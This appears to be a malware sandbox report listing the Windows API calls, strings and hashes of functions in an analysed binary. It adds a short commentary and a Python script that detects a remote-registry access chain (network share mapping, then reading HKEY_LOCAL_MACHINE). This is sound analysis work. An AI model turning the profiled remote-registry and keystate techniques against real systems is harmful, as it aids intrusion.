                                                                                                                                                                              • Opcode Fuzzy Hash: f53f690b4ff73c755abb77106c2da9d747e68a29c0074ee6a4ef67d5f7392e6e
                                                                                                                                                                              • Instruction Fuzzy Hash: D0518D34A00249AFDB24DF2ACC45BAA7BB5FF49710F144518F946A72E0D7B0E990DB60
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00DA249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00DA24B0
                                                                                                                                                                                • Part of subcall function 00DA19CD: GetCursorPos.USER32(?), ref: 00DA19E1
                                                                                                                                                                                • Part of subcall function 00DA19CD: ScreenToClient.USER32(00000000,?), ref: 00DA19FE
                                                                                                                                                                                • Part of subcall function 00DA19CD: GetAsyncKeyState.USER32(00000001), ref: 00DA1A23
                                                                                                                                                                                • Part of subcall function 00DA19CD: GetAsyncKeyState.USER32(00000002), ref: 00DA1A3D
                                                                                                                                                                              • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?), ref: 00E395C7
                                                                                                                                                                              • ImageList_EndDrag.COMCTL32 ref: 00E395CD
                                                                                                                                                                              • ReleaseCapture.USER32 ref: 00E395D3
                                                                                                                                                                              • SetWindowTextW.USER32(?,00000000), ref: 00E3966E
                                                                                                                                                                              • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00E39681
                                                                                                                                                                              • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?), ref: 00E3975B
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                                                                                                                                              • String ID: @GUI_DRAGFILE$@GUI_DROPID$($(
                                                                                                                                                                              • API String ID: 1924731296-3832140312
                                                                                                                                                                              • Opcode ID: db73ca406e4d86137fb2d387b8cdce339e4210edaf968403252a3692e1f3dbc8
                                                                                                                                                                              • Instruction ID: 12f34bf3138a652ef188e1af699e53eecdf0af1bf24e8d5f0b87719e1c3ba724
                                                                                                                                                                              • Opcode Fuzzy Hash: db73ca406e4d86137fb2d387b8cdce339e4210edaf968403252a3692e1f3dbc8
                                                                                                                                                                              • Instruction Fuzzy Hash: F651B171104304AFD704EF21DC5AFAA7BE4FB88714F000A1DF696A72E2CB719949CB62
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,00000001,00000000,?,00DF0D31,00000001,0000138C,00000001,00000000,00000001,?,00E1EEAE,00E72430), ref: 00E0A091
                                                                                                                                                                              • LoadStringW.USER32(00000000,?,00DF0D31,00000001), ref: 00E0A09A
                                                                                                                                                                                • Part of subcall function 00DAB329: _wcslen.LIBCMT ref: 00DAB333
                                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,00DF0D31,00000001,0000138C,00000001,00000000,00000001,?,00E1EEAE,00E72430,?), ref: 00E0A0BC
                                                                                                                                                                              • LoadStringW.USER32(00000000,?,00DF0D31,00000001), ref: 00E0A0BF
                                                                                                                                                                              • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00E0A1E0
                                                                                                                                                                              Strings
Memory Dump Source
• Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
• Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
Similarity
• API ID: HandleLoadModuleString$Message_wcslen
• String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
• API String ID: 747408836-2268648507
• Opcode ID: 56c969a517b661fa6d89b07df94cf6f014314bfc1224d5e6cc00ff58288c5eb6
• Instruction ID: 0bf33d61160dde9c646c49f06c760649671690a5568a004835cd26dc618542c1
• Opcode Fuzzy Hash: 56c969a517b661fa6d89b07df94cf6f014314bfc1224d5e6cc00ff58288c5eb6
• Instruction Fuzzy Hash: C2412B7280120DAACF14EBE0DD46EEEB778EF19340F540065B506B6092EB75AF49CB71
APIs
  • Part of subcall function 00DA8577: _wcslen.LIBCMT ref: 00DA858A
• WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00E01093
• RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00E010AF
• RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00E010CB
• RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00E010F5
• CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 00E0111D
• RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00E01128
• RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00E0112D
Strings
Similarity
• API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
• String ID: SOFTWARE\Classes\$\CLSID$\IPC$
• API String ID: 323675364-22481851
• Opcode ID: 5e63cd866b0f05be69f80cf093ef050d6893bbe71aa90bb319115b0ba0cf712d
• Instruction ID: 055a31f85ad49f31e6f4d1f278c245769c9e2976e6f91dcf393b7b0ebe3d17f4
• Opcode Fuzzy Hash: 5e63cd866b0f05be69f80cf093ef050d6893bbe71aa90bb319115b0ba0cf712d
• Instruction Fuzzy Hash: BE41F572C1022DAFCF15EBA4EC859EEBB78FF14750F04416AE901B61A1EB319E45CB60
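The function above is the one entry in this listing worth a second look: the call order reads as "map a network resource with WNetAddConnection2W, attach to a remote hive with RegConnectRegistryW, open a key under SOFTWARE\Classes with RegOpenKeyExW, read a value, hand it to CLSIDFromString", and the String ID line adds \CLSID and \IPC$ to the picture. Everything the static pass could not resolve is printed as "?", so the report does not tell us which host is targeted; what it does give us are the constants. The script below is an added example, not part of the Joe Sandbox report: it parses this listing's own notation into call records and checks that chain, decoding the hKey argument of RegConnectRegistryW and the samDesired argument of RegOpenKeyExW against the standard Win32 values (HKEY_LOCAL_MACHINE, KEY_READ). The regular expression is written only for the "• Name.Module(args), ref: addr" form used on this page, and the sample block is a copy of the eight lines above.

```python
import re

# Constructed sample: the "APIs" block of the function listed above, copied in
# the report's own notation ("•" bullets, "ref:" virtual addresses, "?" for
# arguments the static pass could not resolve).
SAMPLE_BLOCK = r"""
APIs
• Part of subcall function 00DA8577: _wcslen.LIBCMT ref: 00DA858A
• WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00E01093
• RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00E010AF
• RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00E010CB
• RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00E010F5
• CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 00E0111D
• RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00E01128
• RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00E0112D
"""

# One API line of the listing: optional "Part of subcall function XXXXXXXX:",
# then Name.Module, an optional "(arg,arg,...)" list, and the "ref:" address.
API_LINE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)

# Standard Win32 values for the two constants this chain exposes.
HKEY_ROOTS = {
    0x80000000: "HKEY_CLASSES_ROOT",
    0x80000001: "HKEY_CURRENT_USER",
    0x80000002: "HKEY_LOCAL_MACHINE",
    0x80000003: "HKEY_USERS",
}
KEY_RIGHTS = {0x20019: "KEY_READ", 0x20006: "KEY_WRITE", 0xF003F: "KEY_ALL_ACCESS"}


def parse_api_block(text):
    """Turn the bullet lines of one 'APIs' block into call records, in order."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line.strip())
        if not m:
            continue  # headers such as "APIs"/"Strings" and blank lines
        args = m.group("args")
        calls.append({
            "name": m.group("name"),
            "module": m.group("module"),
            "args": [] if args is None else args.split(","),
            "ref": m.group("ref"),
            "subcall": m.group("sub"),
        })
    return calls


def decode_const(value, table):
    """Name a hex argument from the listing; '?' means the sandbox could not resolve it."""
    if value == "?":
        return "unresolved"
    return table.get(int(value, 16), "0x%X" % int(value, 16))


def find_remote_registry_chain(calls):
    """Return details if the block connects a network resource and then opens a remote hive."""
    names = [c["name"] for c in calls]
    if not {"WNetAddConnection2W", "RegConnectRegistryW"} <= set(names):
        return None
    i_net = names.index("WNetAddConnection2W")
    i_reg = names.index("RegConnectRegistryW")
    if i_reg < i_net:  # the connection must be established before the remote hive is opened
        return None
    reg_calls = calls[i_reg:]
    open_calls = [c for c in reg_calls if c["name"] == "RegOpenKeyExW"]
    return {
        "hive": decode_const(calls[i_reg]["args"][1], HKEY_ROOTS),   # 2nd arg: hKey
        "access": [decode_const(c["args"][3], KEY_RIGHTS) for c in open_calls],  # 4th arg: samDesired
        "subkeys": sorted({a for c in reg_calls for a in c["args"] if a.startswith("SOFTWARE\\")}),
        # Non-ADVAPI32 calls after the hive is opened show what the value is used for.
        "post_lookup": [c["name"] for c in reg_calls if c["module"] != "ADVAPI32"],
        "refs": (calls[i_net]["ref"], calls[i_reg]["ref"]),
    }


if __name__ == "__main__":
    finding = find_remote_registry_chain(parse_api_block(SAMPLE_BLOCK))
    print(finding)
```

Run against the block above this reports HKEY_LOCAL_MACHINE opened with KEY_READ, the SOFTWARE\Classes\ subkey, and CLSIDFromString as the consumer of the value, with the two anchor addresses 00E01093 and 00E010AF for cross-referencing in the dump. The order check matters: RegConnectRegistryW appearing before WNetAddConnection2W in the same function would be a different (and less interesting) pattern, and the detector deliberately says nothing about the host, because the listing resolves that argument to "?".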
APIs
• MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00E34AD9
• CreateCompatibleDC.GDI32(00000000), ref: 00E34AE0
• SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00E34AF3
• SelectObject.GDI32(00000000,00000000), ref: 00E34AFB
• GetPixel.GDI32(00000000,00000000,00000000), ref: 00E34B06
• DeleteDC.GDI32(00000000), ref: 00E34B10
• GetWindowLongW.USER32(?,000000EC), ref: 00E34B1A
• SetLayeredWindowAttributes.USER32(?,?,00000000,00000001,?,00000000,?), ref: 00E34B30
• DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?), ref: 00E34B3C
Strings
Similarity
• API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
• String ID: static
• API String ID: 2559357485-2160076837
• Opcode ID: fd82d1d306e426def44cdb557b53f9b834fa228bcce9d829b675f198ad5b8550
• Instruction ID: 6e8431d03acdc5a70528636e4992574933e0be6b02a95944368331be51fe00d2
• Opcode Fuzzy Hash: fd82d1d306e426def44cdb557b53f9b834fa228bcce9d829b675f198ad5b8550
• Instruction Fuzzy Hash: BF315872100219AFDF129FA5DC0CFDA7FA9EF09324F110211FA14B61A0C735E864DBA4
APIs
• LoadIconW.USER32(00000000,00007F03), ref: 00E0D1BE
Strings
Similarity
• API ID: IconLoad
• String ID: \+$\+$`+$blank$info$question$stop$warning
• API String ID: 2457776203-3382907240
• Opcode ID: 1731c3b584d5c2e9b554cfa44f8bfaad7a9435d14200b8471cb050f88d3a1560
• Instruction ID: 39d99dc89cafeaa17760d94351a6d04d48b1899fb9a38e585765c2164fbdd463
• Opcode Fuzzy Hash: 1731c3b584d5c2e9b554cfa44f8bfaad7a9435d14200b8471cb050f88d3a1560
• Instruction Fuzzy Hash: 7411DA3528D307BEE7055B94EC82EAA77ACDF15769B20102AF501B71C1DFB46AC14370
APIs
• VariantInit.OLEAUT32(?), ref: 00E246B9
• CoInitialize.OLE32(00000000), ref: 00E246E7
• CoUninitialize.OLE32 ref: 00E246F1
• _wcslen.LIBCMT ref: 00E2478A
• GetRunningObjectTable.OLE32(00000000,?), ref: 00E2480E
• SetErrorMode.KERNEL32(00000001,00000029), ref: 00E24932
• CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00E2496B
• CoGetObject.OLE32(?,00000000,00E40B64,?), ref: 00E2498A
• SetErrorMode.KERNEL32(00000000), ref: 00E2499D
• SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00E24A21
• VariantClear.OLEAUT32(?), ref: 00E24A35
Similarity
• API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
• String ID:
• API String ID: 429561992-0
• Opcode ID: b4fca41430291e6e820907dd34b3216ab788e194f5e3e566e10f52bcbf4712b3
• Instruction ID: aa98829eb29889718fb02f781508ac44a1a569b1a2c82ef5090ba4cfd6ce7654
• Opcode Fuzzy Hash: b4fca41430291e6e820907dd34b3216ab788e194f5e3e566e10f52bcbf4712b3
• Instruction Fuzzy Hash: 97C179B16083159FC704DF68D88496BBBE9FF89708F00591DF98AAB290D731ED45CB62
APIs
• CoInitialize.OLE32(00000000), ref: 00E18538
• SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00E185D4
• SHGetDesktopFolder.SHELL32(?), ref: 00E185E8
• CoCreateInstance.OLE32(00E40CD4,00000000,00000001,00E67E8C,?), ref: 00E18634
• SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00E186B9
• CoTaskMemFree.OLE32(?,?), ref: 00E18711
• SHBrowseForFolderW.SHELL32(?), ref: 00E1879C
• SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00E187BF
• CoTaskMemFree.OLE32(00000000), ref: 00E187C6
• CoTaskMemFree.OLE32(00000000), ref: 00E1881B
• CoUninitialize.OLE32 ref: 00E18821
Similarity
• API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
• String ID:
• API String ID: 2762341140-0
• Opcode ID: 92e51debf67fdb0f8a48409b0bccf508e3c8022df0375b2db297c3e13e8b8dbb
• Instruction ID: d6fe22ee8836019cc52d5451f18b9635991c3ce10999ec1f18c66a49235a7836
• Opcode Fuzzy Hash: 92e51debf67fdb0f8a48409b0bccf508e3c8022df0375b2db297c3e13e8b8dbb
• Instruction Fuzzy Hash: 98C10A75A00109AFCB14DF65C988DAEBBF5FF48314B148599E419EB261DB30ED85CBA0
APIs
• SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00E0039F
• SafeArrayAllocData.OLEAUT32(?), ref: 00E003F8
• VariantInit.OLEAUT32(?), ref: 00E0040A
• SafeArrayAccessData.OLEAUT32(?,?), ref: 00E0042A
• VariantCopy.OLEAUT32(?,?), ref: 00E0047D
• SafeArrayUnaccessData.OLEAUT32(?), ref: 00E00491
• VariantClear.OLEAUT32(?), ref: 00E004A6
• SafeArrayDestroyData.OLEAUT32(?), ref: 00E004B3
• SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00E004BC
• VariantClear.OLEAUT32(?), ref: 00E004CE
• SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00E004D9
Similarity
• API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
• String ID:
• API String ID: 2706829360-0
• Opcode ID: 480eb83264ea391e7945e4aeaa049698c70846509deecdc7ac7b64fcda6dadd2
• Instruction ID: 19528a24f01288bf8f0d5f7aebae4de50e4ea74fd04aa3349db96cc9d74d617f
• Opcode Fuzzy Hash: 480eb83264ea391e7945e4aeaa049698c70846509deecdc7ac7b64fcda6dadd2
• Instruction Fuzzy Hash: 23415135A0021DDFCB14DF65DC48AEE7FB9EF48354F008469E965B7261C734A985CBA0
APIs
• GetKeyboardState.USER32(?), ref: 00E0A65D
• GetAsyncKeyState.USER32(000000A0), ref: 00E0A6DE
• GetKeyState.USER32(000000A0), ref: 00E0A6F9
• GetAsyncKeyState.USER32(000000A1), ref: 00E0A713
• GetKeyState.USER32(000000A1), ref: 00E0A728
• GetAsyncKeyState.USER32(00000011), ref: 00E0A740
• GetKeyState.USER32(00000011), ref: 00E0A752
• GetAsyncKeyState.USER32(00000012), ref: 00E0A76A
• GetKeyState.USER32(00000012), ref: 00E0A77C
• GetAsyncKeyState.USER32(0000005B), ref: 00E0A794
• GetKeyState.USER32(0000005B), ref: 00E0A7A6
Similarity
• API ID: State$Async$Keyboard
• String ID:
• API String ID: 541375521-0
• Opcode ID: e3be25dea2e4847096807e88e937b6926c1816e00f5f51bbf2d37f822f19cbf9
• Instruction ID: a24d4bc819ea59b5d95a500b0e27ab20cac19d814ecb24d74a7cb923130c2eab
• Opcode Fuzzy Hash: e3be25dea2e4847096807e88e937b6926c1816e00f5f51bbf2d37f822f19cbf9
• Instruction Fuzzy Hash: B341C6645087CDAEFF319660D8043A5BEB06F1134CF0CD06AD5C67A1C2EBA599D8CBA3
Similarity
• API ID: _wcslen$BuffCharLower
• String ID: cdecl$none$stdcall$winapi
• API String ID: 707087890-567219261
• Opcode ID: 75d52f254688c8613b4b7a6767c82580e1e3ea8848e0c990adf5918f70bc9c7f
• Instruction ID: 5291b73314f4cf9cf8b42a734cc2e12494b1f0cd3a2226970f409552f6e60511
• Opcode Fuzzy Hash: 75d52f254688c8613b4b7a6767c82580e1e3ea8848e0c990adf5918f70bc9c7f
• Instruction Fuzzy Hash: 8751F531A001269BCF18DF6CD9519BEB7A1FF55364F24622AE866F7282D731DD40C7A0
APIs
• CoInitialize.OLE32 ref: 00E241D1
• CoUninitialize.OLE32 ref: 00E241DC
• CoCreateInstance.OLE32(?,00000000,00000017,00E40B44,?), ref: 00E24236
• IIDFromString.OLE32(?,?), ref: 00E242A9
• VariantInit.OLEAUT32(?), ref: 00E24341
• VariantClear.OLEAUT32(?), ref: 00E24393
Similarity
• API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
• String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
• API String ID: 636576611-1287834457
• Opcode ID: 178c7d68c4b4f89e75041c1aab7fa53fab73ec7211a9a65fdcae380fb27f46dc
• Instruction ID: 3c534843fca2cc9c847a13ef5e1be3d84c6e441fa1f811bfc3c63e347b0fdb91
• Opcode Fuzzy Hash: 178c7d68c4b4f89e75041c1aab7fa53fab73ec7211a9a65fdcae380fb27f46dc
• Instruction Fuzzy Hash: CE61A2B1608711DFC310DF65E849B9ABBE4EF49714F001909F585A72A1CB70ED48CBA2
APIs
• GetLocalTime.KERNEL32(?), ref: 00E18C9C
• SystemTimeToFileTime.KERNEL32(?,?), ref: 00E18CAC
• LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00E18CB8
• GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00E18D55
• SetCurrentDirectoryW.KERNEL32(?), ref: 00E18D69
• SetCurrentDirectoryW.KERNEL32(?), ref: 00E18D9B
• SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00E18DD1
• SetCurrentDirectoryW.KERNEL32(?), ref: 00E18DDA
Similarity
• API ID: CurrentDirectoryTime$File$Local$System
• String ID: *.*
• API String ID: 1464919966-438819550
• Opcode ID: d14ecf24bbf4b0d3f2f828f39acbbb6a372f8bd84111e29334022bb06a068cf8
• Instruction ID: 0f98daa242fd61ebcbeee50bdcbde00bb3fc89091761f8dcf08624c386dfbda7
• Opcode Fuzzy Hash: d14ecf24bbf4b0d3f2f828f39acbbb6a372f8bd84111e29334022bb06a068cf8
• Instruction Fuzzy Hash: BD6159B25043059FCB10EF60D9449DEB7E9FF89314F04492EF989A7251DB31E985CBA2
APIs
• ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00DE39E2,00000004,00000000,00000000), ref: 00DBFC41
• ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,00DE39E2,00000004,00000000,00000000), ref: 00DFFC15
• ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00DE39E2,00000004,00000000,00000000), ref: 00DFFC98
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ShowWindow
                                                                                                                                                                              • String ID: (
                                                                                                                                                                              • API String ID: 1268545403-2063206799
                                                                                                                                                                              • Opcode ID: 5b732f4dd57646b30d382c076f44567f83eaf6823293926a91980ee0cea7ec83
                                                                                                                                                                              • Instruction ID: aa292f17b9be69d72528b07d2bdb4799c0970e68e8dd115baf9e038e2dd8833f
                                                                                                                                                                              • Opcode Fuzzy Hash: 5b732f4dd57646b30d382c076f44567f83eaf6823293926a91980ee0cea7ec83
                                                                                                                                                                              • Instruction Fuzzy Hash: F741823160838CDEC7358B399DC9BBA7FA1AF46350F19852DEA8756A60C671A8C4C731
                                                                                                                                                                              APIs
                                                                                                                                                                              • CreateMenu.USER32 ref: 00E34715
                                                                                                                                                                              • SetMenu.USER32(?,00000000), ref: 00E34724
                                                                                                                                                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00E347AC
                                                                                                                                                                              • IsMenu.USER32(?), ref: 00E347C0
                                                                                                                                                                              • CreatePopupMenu.USER32 ref: 00E347CA
                                                                                                                                                                              • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00E347F7
                                                                                                                                                                              • DrawMenuBar.USER32 ref: 00E347FF
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                                                                                                                              • String ID: 0$F
                                                                                                                                                                              • API String ID: 161812096-3044882817
                                                                                                                                                                              • Opcode ID: 89d4e933af0ff7532e407e1a1026fef005067607833a5f13371eb4ddb084567d
                                                                                                                                                                              • Instruction ID: 8c94f4a8b9ec015ec91e93493bfba233c9d6da4d50460a5db43b530d4ca52e5d
                                                                                                                                                                              • Opcode Fuzzy Hash: 89d4e933af0ff7532e407e1a1026fef005067607833a5f13371eb4ddb084567d
                                                                                                                                                                              • Instruction Fuzzy Hash: ED418BB5A01209EFDB14CF65E888EAA7BB5FF49314F14402DFA45A7390C770A914CF50
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00DAB329: _wcslen.LIBCMT ref: 00DAB333
                                                                                                                                                                                • Part of subcall function 00E045FD: GetClassNameW.USER32(?,?,000000FF), ref: 00E04620
                                                                                                                                                                              • SendMessageW.USER32(?,0000018C,000000FF,00020000), ref: 00E028B1
                                                                                                                                                                              • GetDlgCtrlID.USER32 ref: 00E028BC
                                                                                                                                                                              • GetParent.USER32 ref: 00E028D8
                                                                                                                                                                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 00E028DB
                                                                                                                                                                              • GetDlgCtrlID.USER32(?), ref: 00E028E4
                                                                                                                                                                              • GetParent.USER32(?), ref: 00E028F8
                                                                                                                                                                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 00E028FB
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                                                                                                                                              • String ID: ComboBox$ListBox
                                                                                                                                                                              • API String ID: 711023334-1403004172
                                                                                                                                                                              • Opcode ID: 7dbd930b19bbfaee9d0534b1a33e01eee12337ed370470ca695c341ed56dfd52
                                                                                                                                                                              • Instruction ID: d81e9d6c9e3536ef8078e0555e3948e55a428202e412178557f703ea4aa2f9c2
                                                                                                                                                                              • Opcode Fuzzy Hash: 7dbd930b19bbfaee9d0534b1a33e01eee12337ed370470ca695c341ed56dfd52
                                                                                                                                                                              • Instruction Fuzzy Hash: 8121AFB5900118BFCF05ABA0DC89EEEBBB4EF06350F40511ABA62B72D1DB355859DB60
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00DAB329: _wcslen.LIBCMT ref: 00DAB333
                                                                                                                                                                                • Part of subcall function 00E045FD: GetClassNameW.USER32(?,?,000000FF), ref: 00E04620
                                                                                                                                                                              • SendMessageW.USER32(?,00000186,00020000,00000000), ref: 00E02990
                                                                                                                                                                              • GetDlgCtrlID.USER32 ref: 00E0299B
                                                                                                                                                                              • GetParent.USER32 ref: 00E029B7
                                                                                                                                                                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 00E029BA
                                                                                                                                                                              • GetDlgCtrlID.USER32(?), ref: 00E029C3
                                                                                                                                                                              • GetParent.USER32(?), ref: 00E029D7
                                                                                                                                                                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 00E029DA
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
